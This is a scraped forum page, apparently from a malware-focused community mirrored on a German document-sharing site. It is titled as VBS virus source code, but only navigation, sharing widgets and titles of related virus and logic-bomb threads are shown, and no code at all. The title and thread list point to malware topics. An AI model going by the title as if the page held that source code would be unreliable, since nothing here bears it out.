Started by pedro-javierf, 28 Apr 2016 reversing, exploit, malware and 4 more...
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
Community Forum Software by IP.Board

Licensed to: Rohitab Batra

 Change Theme
 Privacy Policy
 Help

(VBS Virus) Pornography Terminator Source Code: Sign in Create Account

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

(VBS Virus) Pornography Terminator Source Code: Sign in Create Account

Hochgeladen von

Copyright:

Verfügbare Formate

 Twitter

rohitab.com ...feed your brain

 Rules, Guidelines & FAQ

 View New Content

[VBS Virus]Pornography Terminator Source code

 Please log in to reply

Posted 29 March 2013 - 07:00 PM

Started by droppr, 04 May 2017 C++, logic bomb, virus

Started by zwclose7, 09 Apr 2017 PE infection, file appending and 3 more...

Started by kuku, 03 Dec 2016 virus, malware, infection, c++

Started by aviator, 22 Aug 2016 malware, virus and 4 more...

Started by pedro-javierf, 28 Apr 2016 reversing, exploit, malware and 4 more...

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Community Forum Software by IP.Board

Das könnte Ihnen auch gefallen